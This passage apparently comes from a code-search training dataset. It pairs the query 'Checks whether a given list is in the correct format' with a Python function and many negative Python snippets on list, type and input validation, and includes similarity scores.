np.random.normal(0, size, (self.N, self.d))\n elif mode == 'circle':\n from math import cos, sin\n x_range = size / 2.0\n y_range = size / 2.0\n c = np.array((x_range, y_range))\n r = 0.9 * min(x_range, y_range)\n theta = 2 * pi / self.N\n for i in range(self.N):\n theta_tot = i * theta\n self.points[i, :] = c + np.array(\n (r * cos(theta_tot), r * sin(theta_tot)))\n elif mode == 'set':\n \"\"\"\n Place points according to hard coded rule.\n \"\"\"\n if self.N == 3:\n x = [-1.0, 1.0, 0.0]\n y = [-1.0, -1.0, 1.0]\n elif self.N == 4:\n x = [-1.0, 1.0, 0.0, 0.0]\n y = [-1.0, -1.0, 1.0, 0.0]\n elif self.N == 5:\n x = [-0.0, 1.5, 1.5, -0.0, -1.0]\n y = [-1.0, -1.0, 1.0, 1.0, 0.0]\n else:\n print(\"Error: No rule defined for N = \", self.N)\n return\n self.points = np.c_[x, y]\n elif mode == 'geogebra':\n if self.N == 4:\n self.points = np.array(((1.5, 1.8), (7.9, 2.5), (2.3, 5.1),\n (3.34, -1.36)))\n elif self.N == 5:\n self.points = np.array(((1.5, 1.8), (7.9, 2.5), (2.3, 5.1),\n (3.34, -1.36), (5, 1.4)))\n else:\n print(\"Error: No rule defined for N = \", self.N)\n elif mode == '':\n if points is None:\n raise NotImplementedError(\"Need to give either mode or points.\")\n else:\n self.points = points\n self.N, self.d = points.shape\n\n self.init()", "def _sample(self, points: Iterable[float]) -> np.array:\n pass", "def _empty_clusters(clusters):\n for clst in clusters:\n clst.points = []", "def init(self, init_points):\n\n # Generate random points\n l = [numpy.random.uniform(x[0], x[1], size=init_points) for x in self.bounds]\n\n # Concatenate new random points to possible existing points from self.explore method.\n self.init_points += list(map(list, zip(*l)))\n\n # Create empty list to store the new values of the function\n y_init = []\n\n # Evaluate 
target function at all initialization points (random + explore)\n for x in self.init_points:\n\n if self.verbose:\n print('Initializing function at point: ', dict(zip(self.keys, x)), end='')\n\n y_init.append(self.f(**dict(zip(self.keys, x))))\n\n if self.verbose:\n print(' | result: %f' % y_init[-1])\n\n # Append any other points passed by the self.initialize method (these also have\n # a corresponding target value passed by the user).\n self.init_points += self.x_init\n\n # Append the target value of self.initialize method.\n y_init += self.y_init\n\n # Turn it into numpy array and store.\n self.X = numpy.asarray(self.init_points)\n self.Y = numpy.asarray(y_init)\n\n # Updates the flag\n self.initialized = True", "def setPointsToTurn(self):\r\n for point in self.points:\r\n point.setActiveTurn()", "def create_points(data):\n #TODO list comprehension\n for row in data:\n\n if row[\"x\"] and row[\"y\"]:\n try:\n row[\"geometry\"] = point.Point(float(row[\"x\"]), float(row[\"y\"]))\n except:\n row[\"geometry\"] = None\n else:\n row[\"geometry\"] = None\n\n return data", "def addpoints(self, x, w):\n if isinstance(x, list) and isinstance(w, list):\n self.xp.extend(x)\n self.wp.extend(w)\n else:\n self.xp.append(x)\n self.wp.append(w)", "def pointListForPlus(x, y):\n\n\tpointList = []\n\n\tif x < 10:\n\t\txString = \"0%d\" % x\n\telse:\n\t\txString = \"%d\" % x\n\n\tif x < 11:\n\t\txMString = \"0%d\" % (x - 1)\n\telse:\n\t\txMString = \"%d\" % (x - 1)\n\n\tif x < 9:\n\t\txPString = \"0%d\" % (x + 1)\n\telse:\n\t\txPString = \"%d\" % (x + 1)\n\n\tif y < 11:\n\t\tyMString = \"0%d\" % (y - 1)\n\telse:\n\t\tyMString = \"%d\" % (y - 1)\n\n\tif y < 9:\n\t\tyPString = \"0%d\" % (y + 1)\n\telse:\n\t\tyPString = \"%d\" % (y + 1)\n\n\tif y < 10:\n\t\tyString = \"0%d\" % y\n\telse:\n\t\tyString = \"%d\" % y\n\n\ttl = [\"%s%sTL\" % (xString, yString), 0.25, 0.25, [\t\"%s%sTR\" % (xMString, yString),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"%s%sBL\" % (xString, yString),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"%s%sCC\" % (xString, yString)]]\n\ttr = [\"%s%sTR\" % (xString, yString), 0.75, 0.25, [\t\"%s%sTL\" % (xString, yString),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"%s%sBR\" % (xString, yMString),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"%s%sCC\" % (xString, yString)]]\n\tbl = [\"%s%sBL\" % (xString, yString), 0.25, 0.75, [\t\"%s%sBR\" % (xString, yString),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"%s%sTL\" % (xString, yPString),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"%s%sCC\" % (xString, yString)]]\n\tbr = [\"%s%sBR\" % (xString, yString), 0.75, 0.75, [\t\"%s%sBL\" % (xPString, yString),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"%s%sTR\" % (xString, yString),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"%s%sCC\" % (xString, yString)]]\n\tcc = [\"%s%sCC\" % (xString, yString), 0.50, 0.50, [\t\"%s%sTL\" % (xString, yString),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"%s%sTR\" % (xString, yString),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"%s%sBL\" % (xString, yString),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"%s%sBR\" % (xString, yString)]]\n\n\tpointList = [tl, tr, bl, br, cc]\n\n\treturn pointList", "def __init__(self, num_points=5000):\n self.num_points = num_points\n\n # All walks start at (0, 0)\n self.x_values = [0]\n self.y_values = [0]", "def __init__(self, num_points=5000):\n self.num_points = num_points\n\n # All walks start at (0, 0)\n self.x_values = [0]\n self.y_values = [0]", "def _createPoints(self):\n self.doc2quest = self._docMapping()\n\n self.unigram, self.bigram = invertedIndex(self.documents)\n self.points = [dataPoint(key, self) for key in self.questions.keys()]", "def test_fill():\r\n 
CONSTANTE_DEBUT = 0\r\n CONSTANTE_FIN= 20\r\n CONSTANTE_DEBUT_2 = 0\r\n CONSTANTE_FIN_2 = 1000\r\n TAILLE_MAX= 10\r\n print(\"test 1\")\r\n # on teste avec que des valeurs comprises entre 0 et 20\r\n print(fill_list(CONSTANTE_DEBUT,CONSTANTE_FIN,TAILLE_MAX))\r\n print(\"test 2\")\r\n # on teste avec des valeurs non comprses dans l'intervalle(sauf la première)\r\n print(fill_list(CONSTANTE_DEBUT, CONSTANTE_FIN, TAILLE_MAX))\r\n print(\"test 3\")\r\n #on saisie de suite une valeur incorrecte\r\n print(fill_list(CONSTANTE_DEBUT, CONSTANTE_FIN, TAILLE_MAX))\r\n\r\n #on teste avec des intervalles plus grandes\r\n print(\"on teste avec des intervalles plus grandes\")\r\n print(\"test 1\")\r\n # on teste avec que des valeurs comprises entre 0 et 1000\r\n print(fill_list(CONSTANTE_DEBUT_2, CONSTANTE_FIN_2, TAILLE_MAX))\r\n print(\"test 2\")\r\n # on teste avec des valeurs non comprses dans l'intervalle(sauf la première)\r\n print(fill_list(CONSTANTE_DEBUT_2, CONSTANTE_FIN_2, TAILLE_MAX))\r\n print(\"test 3\")\r\n # on saisie de suite une valeur incorrecte\r\n print(fill_list(CONSTANTE_DEBUT_2, CONSTANTE_FIN_2, TAILLE_MAX))", "def fill(self, x, y, color):\n raise NotImplementedError # Override this function in the Solution classes", "def points_generator(self):\n rows, cols = self.game.board.board_size\n points = [Point(i, j) for i, j in product(range(rows), range(cols))]\n for point in points:\n yield point", "def clear(self, points, lmap):\n for coord in points:\n if lmap.cellWithinBoundaries(coord):\n color = self.colorMap(lmap.getCell(coord))\n self.im.put(color, coord)\n self.zoomMap(self.scale)", "def pts(self, pts):\n\n self._pts = pts", "def toFillPolygons(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads\r\n pass", "def assign_points(players):\n pass", "def fillIn(self):\n\n # Grabs first point (which is a shore) and prefills in hashes\n toBeAnalyzed = [self.points[0]]\n islandHash = defaultdict(list)\n islandHash[toBeAnalyzed[0].x].append(toBeAnalyzed[0].x)\n islandGridPoints = toBeAnalyzed[:]\n\n # Find all points not at pond-level.\n while toBeAnalyzed:\n gridPoint = toBeAnalyzed.pop()\n neighbors = self.analyzeData.iterateDiagonal(gridPoint.x,\n gridPoint.y)\n for _x, _y, elevation in neighbors:\n\n if elevation != self.pondElevation and _y not in\\\n islandHash[_x]:\n branch = GridPoint(_x, _y, elevation)\n islandHash[_x].append(_y)\n toBeAnalyzed.append(branch)\n islandGridPoints.append(branch)\n self.points = islandGridPoints", "def fillingrid(self):\n\n if self.imagearray is None:\n if self.gs.isfixed:\n for n in range(0, self.numcols):\n self.vspins[n].setValue(self.currentvalues[n])\n elif self.gs.isperc:\n for n in range(0, self.numcols):\n self.fillinpercent(n)\n else:\n for n in range(0, self.numcols):\n self.nsspins[n].setValue(self.currentnsigs[n])\n else:\n for n in range(0, self.numcols):\n self.vspins[n].setValue(self.currentvalues[n])\n self.nsspins[n].setValue(self.currentnsigs[n])\n self.fillinpercent(n)", "def _numberOfPoints_changed(self):\n self.reinitialiseData()", "def __fillCoordinatesFromSource(self):\n self.xValues = []\n if self.yCoordinates:\n self.yValues = []\n if self.zCoordinates:\n self.zValues = []\n if self.clusterLabels:\n self.clusterValues = []\n if self.mixtureLabels:\n self.mixtureValues = []\n\n # initial setup for x,y,z Values, clusterValues, mixtureValues, and colorMapValues\n for pltIndex in range(len(self.outStreamTypes)):\n self.xValues.append(defaultdict(list))\n if self.yCoordinates:\n 
self.yValues.append(defaultdict(list))\n if self.zCoordinates:\n self.zValues.append(defaultdict(list))\n if self.clusterLabels:\n self.clusterValues.append(defaultdict(list))\n if self.mixtureLabels:\n self.mixtureValues.append(defaultdict(list))\n if self.colorMapCoordinates[pltIndex] is not None:\n self.colorMapValues[pltIndex] = defaultdict(list)\n\n # fill x,y,z Values, clusterValues, mixtureValues, and colorMapValues\n for pltIndex in range(len(self.outStreamTypes)):\n if len(self.sourceData[pltIndex]) == 0:\n return False\n dataSet = self.sourceData[pltIndex].asDataset()\n # anything but HistorySet\n if self.sourceData[pltIndex].type.strip() != 'HistorySet':\n for i in range(len(self.xCoordinates[pltIndex])):\n xSplit = self._returnSplitIndex('x', pltIndex, i)\n self.xValues[pltIndex][1].append(np.asarray(dataSet[xSplit].values.astype(float, copy=False)))\n if self.yCoordinates:\n for i in range(len(self.yCoordinates[pltIndex])):\n ySplit = self._returnSplitIndex('y', pltIndex, i)\n self.yValues[pltIndex][1].append(np.asarray(dataSet[ySplit.strip()].values.astype(float, copy=False)))\n if self.zCoordinates and self.dim > 2:\n for i in range(len(self.zCoordinates[pltIndex])):\n zSplit = self._returnSplitIndex('z', pltIndex, i)\n self.zValues[pltIndex][1].append(np.asarray(dataSet[zSplit.strip()].values.astype(float, copy=False)))\n if self.clusterLabels:\n for i in range(len(self.clusterLabels[pltIndex])):\n clusterSplit = self._returnSplitIndex('clusterLabels', pltIndex, i)\n self.clusterValues[pltIndex][1].append(np.asarray(dataSet[clusterSplit.strip()].values.astype(float, copy=False)))\n if self.mixtureLabels:\n for i in range(len(self.mixtureLabels[pltIndex])):\n mixtureSplit = self._returnSplitIndex('mixtureLabels', pltIndex, i)\n self.mixtureValues[pltIndex][1].append(np.asarray(dataSet[mixtureSplit.strip()].values.astype(float, copy=False)))\n if self.colorMapCoordinates[pltIndex] is not None:\n for i in range(len(self.colorMapCoordinates[pltIndex])):\n cSplit = self._returnSplitIndex('colorMap', pltIndex, i)\n self.colorMapValues[pltIndex][1].append(np.asarray(dataSet[cSplit.strip()].values.astype(float, copy=False)))\n # check if the array sizes are consistent\n sizeToMatch = self.xValues[pltIndex][1][-1].size\n if self.yCoordinates and self.yValues[pltIndex][1][-1].size != sizeToMatch:\n self.raiseAnError(Exception, f\"<y> variable has a size ({self.yValues[pltIndex][1][-1].size}) that is not consistent with input <x> ({sizeToMatch})\")\n if self.zCoordinates and self.dim > 2 and self.zValues[pltIndex][1][-1].size != sizeToMatch:\n self.raiseAnError(Exception, f\"<z> variable has a size ({self.zValues[pltIndex][1][-1].size}) that is not consistent with input <x> ({sizeToMatch})\")\n if self.colorMapCoordinates[pltIndex] is not None and self.colorMapValues[pltIndex][1][-1].size != sizeToMatch:\n self.raiseAnError(Exception, f\"<colorMap> variable has a size ({self.colorMapValues[pltIndex][1][-1].size}) that is not consistent with input <x> ({sizeToMatch})\")\n else:\n # HistorySet\n pivotParam = self.sourceData[pltIndex].indexes[0]\n for cnt in range(len(self.sourceData[pltIndex])):\n maxSize = 0\n for i in range(len(self.xCoordinates[pltIndex])):\n xSplit = self._returnSplitIndexHS('x', pltIndex, i)\n # for variable from input space, it will return array(float), not 1d array\n self.xValues[pltIndex][cnt].append(np.atleast_1d(dataSet.isel({'RAVEN_sample_ID': cnt}, False).dropna(pivotParam)[xSplit].values.astype(float, copy=False)))\n maxSize = 
self.xValues[pltIndex][cnt][-1].size if self.xValues[pltIndex][cnt][-1].size > maxSize else maxSize\n if self.yCoordinates:\n for i in range(len(self.yCoordinates[pltIndex])):\n ySplit = self._returnSplitIndexHS('y', pltIndex, i)\n self.yValues[pltIndex][cnt].append(np.atleast_1d(dataSet.isel({'RAVEN_sample_ID': cnt}, False).dropna(pivotParam)[ySplit].values.astype(float, copy=False)))\n maxSize = self.yValues[pltIndex][cnt][-1].size if self.yValues[pltIndex][cnt][-1].size > maxSize else maxSize\n if self.zCoordinates and self.dim > 2:\n for i in range(len(self.zCoordinates[pltIndex])):\n zSplit = self._returnSplitIndexHS('z', pltIndex, i)\n self.zValues[pltIndex][cnt].append(np.atleast_1d(dataSet.isel({'RAVEN_sample_ID': cnt}, False).dropna(pivotParam)[zSplit].values.astype(float, copy=False)))\n maxSize = self.zValues[pltIndex][cnt][-1].size if self.zValues[pltIndex][cnt][-1].size > maxSize else maxSize\n if self.colorMapCoordinates[pltIndex] is not None:\n for i in range(len(self.colorMapCoordinates[pltIndex])):\n colorSplit = self._returnSplitIndexHS('colorMap', pltIndex, i)\n self.colorMapValues[pltIndex][cnt].append(dataSet.isel({'RAVEN_sample_ID': cnt}, False).dropna(pivotParam)[colorSplit].values.astype(float, copy=False))\n maxSize = self.colorMapValues[pltIndex][cnt][-1].size if self.colorMapValues[pltIndex][cnt][-1].size > maxSize else maxSize\n # expand the scalars in case they need to be plotted against histories\n if self.xValues[pltIndex][cnt][-1].size == 1 and maxSize > 1:\n self.xValues[pltIndex][cnt][-1] = np.full(maxSize, self.xValues[pltIndex][cnt][-1])\n if self.yCoordinates and self.yValues[pltIndex][cnt][-1].size == 1 and maxSize > 1:\n self.yValues[pltIndex][cnt][-1] = np.full(maxSize, self.yValues[pltIndex][cnt][-1])\n if self.zCoordinates and self.dim > 2 and self.zValues[pltIndex][cnt][-1].size == 1 and maxSize > 1:\n self.zValues[pltIndex][cnt][-1] = np.full(maxSize, self.zValues[pltIndex][cnt][-1])\n if self.colorMapCoordinates[pltIndex] is not None and self.colorMapValues[pltIndex][cnt][-1].size == 1 and maxSize > 1:\n self.colorMapValues[pltIndex][cnt][-1] = np.full(maxSize, self.colorMapValues[pltIndex][cnt][-1])\n # check if the array sizes are consistent\n if self.yCoordinates and self.yValues[pltIndex][cnt][-1].size != maxSize:\n self.raiseAnError(Exception, f\"<y> variable has a size ({self.yValues[pltIndex][cnt][-1].size}) that is not consistent with input <x> ({sizeToMatch})\")\n if self.zCoordinates and self.dim > 2 and self.zValues[pltIndex][cnt][-1].size != maxSize:\n self.raiseAnError(Exception, f\"<z> variable has a size ({self.zValues[pltIndex][cnt][-1].size}) that is not consistent with input <x> ({sizeToMatch})\")\n if self.colorMapCoordinates[pltIndex] is not None and len(self.colorMapValues[pltIndex][cnt][-1]) != maxSize:\n self.raiseAnError(Exception, f\"<colorMap> variable has a size ({self.colorMapValues[pltIndex][cnt][-1].size}) that is not consistent with input <x> ({sizeToMatch})\")\n\n # check if values have been filled\n if len(self.xValues[pltIndex].keys()) == 0:\n return False\n else:\n for key in self.xValues[pltIndex]:\n if len(self.xValues[pltIndex][key]) == 0:\n return False\n else:\n for i in range(len(self.xValues[pltIndex][key])):\n if self.xValues[pltIndex][key][i].size == 0:\n return False\n if self.yCoordinates:\n if len(self.yValues[pltIndex].keys()) == 0:\n return False\n else:\n for key in self.yValues[pltIndex]:\n if len(self.yValues[pltIndex][key]) == 0:\n return False\n else:\n for i in 
range(len(self.yValues[pltIndex][key])):\n if self.yValues[pltIndex][key][i].size == 0:\n return False\n if self.zCoordinates and self.dim > 2:\n if len(self.zValues[pltIndex].keys()) == 0:\n return False\n else:\n for key in self.zValues[pltIndex]:\n if len(self.zValues[pltIndex][key]) == 0:\n return False\n else:\n for i in range(len(self.zValues[pltIndex][key])):\n if self.zValues[pltIndex][key][i].size == 0:\n return False\n if self.clusterLabels:\n if len(self.clusterValues[pltIndex].keys()) == 0:\n return False\n else:\n for key in self.clusterValues[pltIndex]:\n if len(self.clusterValues[pltIndex][key]) == 0:\n return False\n else:\n for i in range(len(self.clusterValues[pltIndex][key])):\n if self.clusterValues[pltIndex][key][i].size == 0:\n return False\n if self.mixtureLabels:\n if len(self.mixtureValues[pltIndex].keys()) == 0:\n return False\n else:\n for key in self.mixtureValues[pltIndex]:\n if len(self.mixtureValues[pltIndex][key]) == 0:\n return False\n else:\n for i in range(len(self.mixtureValues[pltIndex][key])):\n if self.mixtureValues[pltIndex][key][i].size == 0:\n return False\n if self.colorMapCoordinates[pltIndex] is not None:\n if len(self.colorMapValues[pltIndex].keys()) == 0:\n return False\n else:\n for key in self.colorMapValues[pltIndex]:\n if len(self.colorMapValues[pltIndex][key]) == 0:\n return False\n else:\n for i in range(len(self.colorMapValues[pltIndex][key])):\n if self.colorMapValues[pltIndex][key][i].size == 0:\n return False\n\n return True" ]
[ "0.6888405", "0.6835494", "0.673464", "0.6689272", "0.6534429", "0.64859575", "0.6433665", "0.6427808", "0.6359302", "0.6349332", "0.63460994", "0.6302308", "0.6204271", "0.617405", "0.61379343", "0.6130424", "0.6078132", "0.6070575", "0.60653776", "0.60491824", "0.6038039", "0.602961", "0.6016361", "0.5982649", "0.5973803", "0.5968475", "0.59589314", "0.5941821", "0.59351885", "0.5928583", "0.59139645", "0.59098876", "0.59014404", "0.5898659", "0.5894225", "0.5889709", "0.5868676", "0.58548564", "0.58425146", "0.5819542", "0.58140707", "0.58139014", "0.5789529", "0.5780595", "0.5777499", "0.5772272", "0.57519794", "0.57408124", "0.57406706", "0.57133085", "0.5711898", "0.5700518", "0.5691507", "0.5689315", "0.56876606", "0.5685264", "0.5679797", "0.5679797", "0.5679276", "0.5671241", "0.5670391", "0.5663372", "0.56622726", "0.56527245", "0.565084", "0.56459874", "0.5641901", "0.5636375", "0.5631482", "0.5628149", "0.5625695", "0.5622917", "0.5613354", "0.5602308", "0.5590269", "0.55707556", "0.5561794", "0.55595785", "0.55561477", "0.55375874", "0.5535752", "0.5535159", "0.5529766", "0.55228996", "0.5514656", "0.5511208", "0.5503896", "0.5503896", "0.54988045", "0.5491936", "0.5491699", "0.54890263", "0.54826087", "0.54732645", "0.5472633", "0.5472157", "0.547049", "0.5468832", "0.5460318", "0.54567283" ]
0.61397636
14
Checks whether a given list is in the correct format.
def check_if_number(list):
    for item in list:
        try:
            float(item)
        except ValueError as e:
            print WrongTypePointError(item)
            sys.exit()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _is_in_list(l, valid_l):\n\n for elem in l:\n if Settings._is_primitive(elem):\n if not Settings._is_in_prim(elem, valid_l):\n return False\n elif Settings._is_list(elem):\n valid_lists = [l for l in valid_l if isinstance(l, list)]\n if not Settings._is_sublist_in_one_of_lists(elem, valid_lists):\n return False\n elif Settings._is_dict(elem):\n valid_dicts = [d for d in valid_l if isinstance(d, dict)]\n if not Settings._is_dict_in_one_of_dicts(elem, valid_dicts):\n return False\n else:\n raise InvalidSettingError()\n return True", "def check_list(self,list_input):\n if not isinstance(list_input,list):\n raise ValueError('input is not in list type')\n for i in list_input:\n if isinstance(i,list) and len(i) != 0:\n for j in i:\n if not isinstance(j,(float,int)):\n print(j)\n raise ValueError('cannot convert')\n else:\n print(i)\n raise ValueError('wrong defined')", "def check_for_list(check):", "def list_check(lst):\n for item in lst:\n if type(item) != list:\n return False\n return True", "def _is_valid_list(content_type: str) -> bool:\n content_type = content_type.strip()\n\n if not content_type.startswith(\"pt:list\"):\n return False\n\n if not _has_matched_brackets(content_type):\n return False\n\n if not _has_brackets(content_type):\n return False\n\n sub_types = _get_sub_types_of_compositional_types(content_type)\n if len(sub_types) != 1:\n return False\n\n sub_type = sub_types[0]\n return _is_valid_pt(sub_type)", "def _list_validity_check(l, valid_l):\n\n if not Settings._is_in_list(l, valid_l):\n raise InvalidSettingError()", "def is_list_of_list(self) -> bool:\n return bool(AnnotationWrapper.list_of_list_re.match(self.data))", "def is_valid_listing(game_listing):\n try:\n int(game_listing.split(\".\")[0])\n return True\n except Exception as e:\n return False", "def isList(data):\n\ttry:\n\t\tfrom types import ListType\n\t\tif type(data) == ListType:\n\t\t\treturn True\n\texcept ImportError:\n\t\tif type(data) == type([]):\n\t\t\treturn True\n\treturn False", "def is_valid_integer_list(any_list):\n list_object = json.loads(any_list)\n return not any(not is_valid_integer(str(listing_id)) for listing_id in\n list_object)", "def _is_sublist_in_one_of_lists(sublist, lists):\n\n type_to_one_of = Settings._get_type_to_one_of()\n\n for vl in lists:\n next_vl = False\n for e in sublist:\n if Settings._is_primitive(e):\n t = 'primitive'\n elif Settings._is_list(e):\n vl = [l for l in vl if isinstance(l, list)]\n t = 'list'\n elif Settings._is_dict(e):\n vl = [d for d in vl if isinstance(d, dict)]\n t = 'dict'\n else:\n raise InvalidSettingError()\n\n if not type_to_one_of[t](e, vl):\n next_vl = True\n break\n\n if next_vl:\n continue\n return True\n return False", "def IsValidInputType(self, list_of_matches):\n for entry in list_of_matches:\n if not entry:\n return False\n\n return True", "def checkInput(Matrix,List):\r\n \r\n if type(Matrix) != list or type(List) != list:\r\n \r\n raise RuntimeError('malformed')\r\n for k in Matrix:\r\n if type(k) != list:\r\n \r\n raise RuntimeError('malformed')\r\n if len(k) != len(List):\r\n \r\n raise RuntimeError('malformed')\r\n for j in k:\r\n if type(j) != int and type(j) != float:\r\n \r\n raise RuntimeError('malformed')\r\n if j > 30:\r\n \r\n raise RuntimeError('malformed')\r\n for p in List:\r\n if type(p) != str:\r\n \r\n raise RuntimeError('malformed')\r\n\r\n if len(Matrix) != len(List):\r\n \r\n raise RuntimeError('malformed')\r\n return", "def check_list(source, value):\n try:\n return value in json.loads(source)\n except:\n return 
False", "def isValidTypeForList(self, *args):\n return _libsbml.SBasePlugin_isValidTypeForList(self, *args)", "def _should_be_pair(s_list):\n assert(isa(s_list, List))\n return str(s_list).find(' . ') > 0", "def isList(memoryManager, paramsList):\n if isEmptyList(paramsList):\n return [1.0]\n A = paramsList[0]\n if validateList(A):\n return [0.0] if len(A) <= 1 else [1.0]\n return [0.0]", "def output_is_valid(output):\n\n is_correct = type(output) is list\n for member in output:\n is_correct *= type(member) is list\n for item in member:\n is_correct *= type(item) is tuple and len(item) == 2\n\n return bool(is_correct)", "def _check_nested_floats(thelist):\n result = True\n for item in thelist:\n if type(item) in [list,tuple]:\n result = result and _check_nested_floats(item)\n else:\n result = result and type(item) in [int,float]\n return result", "def test_list_format(self) -> None:\n r = self.perform_request('list', False)\n self.assert_json_schema(r.json(), self.get_list_schema())", "def _is_list(item):\n return isinstance(item, list)", "def _is_list(arg):\n return isinstance(arg, collections.Sequence) and not _is_string(arg)", "def check_data_is_format(data):\n try:\n data_lst = data\n if not isinstance(data, list):\n data_lst = json.loads(data)\n\n for data in data_lst:\n if not isinstance(data, dict):\n raise ValueError(\"data contains not dict\")\n\n for key in data.keys():\n check_type(key)\n except ValueError as e:\n logging.error(\"data format check error %s\" % e)\n return False, None\n except Exception as e:\n logging.error(\"data format check unknown error %s\" % e)\n return False, None\n else:\n return True, data_lst", "def is_list(s_list):\n return isa(s_list, List)", "def validate_X(X: List[str]):\n _check_string_list(X)", "def validate_list(types,val,allowed,tname):\n if not len(types): return TYPE_MISMATCH\n if type(val) not in TYPES[tname]: raise Exception('unknown type')\n for v in val:\n result=VALIDATORS[types[-1]](types[:-1],v,allowed,types[-1])\n if not result: return result\n return True", "def _is_list(self):\n # TODO\n if self.is_int():\n return self.int() == 0\n else:\n return self.size_words() == 2 and self.tag() == 0 and self.field(1)._is_list()", "def check_list_exists(this_list=[]):\n if isinstance(this_list, list) and len(this_list) > 0:\n return True\n else:\n return False", "def is_list(self) -> bool:\n return False", "def is_valid_string_listing(listing):\n assert listing is not None\n listing = str(listing)\n if len(listing) == 0:\n return True\n list_object = json.loads(listing)\n return not any(key not in listing_keys\n for key in list_object)", "def is_list(self) -> bool:\n if self.is_list_of_list: # pylint: disable=R1705\n return False\n else:\n return bool(AnnotationWrapper.list_field_re.match(self.data))", "def is_list ( self, s ):\r\n\t\treturn isinstance ( s, type( list () ) )", "def is_in_list(item, list_, kind):\n if item not in list_:\n raise KeyError(f'Specify {kind} from {list_}: got {item}')\n return True", "def string_is_index_list(inp: str):\n inp = inp.strip()\n return len((inp)) > 0 and all([x in [\" \", \":\", \"-\"] or x.isdigit() for x in inp])", "def validate(self, list_value):\n errors = DataDefinition.validate(self, list_value)\n if errors:\n return errors\n\n for index, value in enumerate(list_value):\n errors = self.element_type.validate(value)\n if errors:\n msg = message_factory.get_message(\n 'vapi.data.list.invalid.entry',\n str(value), index)\n return [msg] + errors\n\n return None", "def _can_be_list(pair):\n 
assert(isa(pair, Pair))\n return str(pair).find(' . ') < 0", "def is_sequence_of_list(items):\n return all(isinstance(item, list) for item in items)", "def _check_multilabel_list(obj: Any):\n if not isinstance(obj, list):\n raise TypeError(f\"obj must be a list, got '{type(obj)}'\")\n\n if len(obj) > 0:\n if not isinstance(obj[0], list):\n raise TypeError(f\"obj must contain lists, got '{type(obj[0])}'\")\n\n if len(obj[0]) > 0:\n if not isinstance(obj[0][0], str):\n raise TypeError(\n f\"obj must contain lists of strings, got lists of '{type(obj[0][0])}'\"\n )", "def isList(self, item):\n\t retval = False\n\t if type(item) in (ListType, TupleType) :\n\t retval = True", "def _is_list(val):\n\n return isinstance(val, list)", "def validate_list(parser, listname):\r\n if (valid_ogfile(listname) and valid_resfile(listname)):\r\n return listname\r\n else:\r\n parser.error(\"Filename error: %s\" % listname)", "def args_is_good(arg_list: list) -> bool:\n usage_msg = (\n \"Usage: python operations.py <number1> <number2>\\n\"\n \"Example:\\n\"\n \" python operations.py 10 3\\n\"\n )\n too_many_msg = \"InputError: too many arguments\\n\"\n only_numbers_msg = \"InputError: only numbers\\n\"\n if len(arg_list) == 1:\n print(usage_msg)\n return False\n if len(arg_list) > 3:\n print(too_many_msg, usage_msg)\n return False\n try:\n a, b = int(arg_list[1]), int(arg_list[2])\n # discarding floats here, even those like 5.0\n # use float.is_integer() if need to keep those\n # keeping only 42 or \"42\" (ints with or without quotes)\n if arg_list[1] == str(a) and arg_list[2] == str(b):\n return True\n except TypeError:\n print(only_numbers_msg, usage_msg)\n return False", "def _check_size_of_lists(sequence_header, secstr_header):\n if len(sequence_header) != len(sequence):\n sys.exit(\"The size of the sequence list and sequence header doesn't match\")\n else:\n return True", "def _validate_list_type(self, name, obj, *args):\n if obj is None:\n return\n if isinstance(obj, list):\n for i in obj:\n self._validate_type_not_null(name, i, *args)\n else:\n self._validate_type(name, obj, *args)", "def validate_loans(loans):\n def validate_loan(loan):\n return (type(loan)==list or type(loan)==tuple) and len(loan)==3 \\\n and type(loan[0])==str and type(loan[1])==str and loan[1] in database.LOANABLE_RESOURCES and type(loan[2])==int and loan[2]>=0\n return type(loans)==list and False not in [validate_loan(load) for loan in loans]", "def is_listlike(x: Any) -> bool:\r\n return (isinstance(x, (list, tuple)))", "def _validate_list_data(self, expected, actual):\n for e in expected:\n if e not in actual:\n return \"expected item {} not found in actual list\".format(e)\n return None", "def empty_list(input_list):\n for item in input_list:\n if not isinstance(item, list) or not empty_list(item):\n return False\n return True", "def check_IP_addr(self, iplist):\n\n if type(iplist) != list:\n print(\"Error: please provide a list of IPv4 addresses to check (as a list of strings).\")\n return False\n\n for ip_addr in iplist:\n # Converts ip_addr to string, in case of bad type being passed\n ip_addr = str(ip_addr)\n\n # Checks ip_addr format\n try: \n inet_aton(ip_addr)\n except:\n print(\"Error: '{}' is an invalid IPv4 address.\\n\"\\\n \"Please use a valid IPv4 address (e.g.: 192.168.0.1)\".format(ip_addr))\n return False\n return True", "def _validate_list_of_dict(list_of_dict):\n return isinstance(list_of_dict, list) and 'pr' in list_of_dict[0] and 'issue' in list_of_dict[0]", "def check_list_valid_input(modname, objname, 
objdict, indent=''):\n\n cnts = [0] * NUMCNTS\n # how to name list\n if pfwdefs.SW_FILEPAT not in objdict and pfwdefs.FILENAME not in objdict:\n error(indent, \"module %s, %s, %s - Missing terms needed to determine list filename\" % (modname, pfwdefs.SW_INPUTS, objname))\n cnts[ERRCNT_POS] += 1\n\n # directory location for list\n if pfwdefs.DIRPAT not in objdict:\n error(indent, \"module %s, %s, %s - Missing %s\" % (modname, pfwdefs.SW_INPUTS, objname, pfwdefs.DIRPAT))\n cnts[ERRCNT_POS] += 1\n\n # what goes into the list\n if pfwdefs.DIV_LIST_BY_COL not in objdict and 'columns' not in objdict:\n error(indent, \"module %s, %s, %s - Missing terms needed to determine column(s) in list(s) (%s or %s)\" % (modname, pfwdefs.SW_INPUTS, objname, pfwdefs.DIV_LIST_BY_COL, 'columns'))\n cnts[ERRCNT_POS] += 1\n\n return cnts", "def isList(l):\r\n return hasattr(l, '__iter__') \\\r\n or (type(l) in (types.ListType, types.TupleType))", "def is_list_of(seq, expected_type):\n return is_seq_of(seq, expected_type, seq_type=list)", "def test_list(self, items: 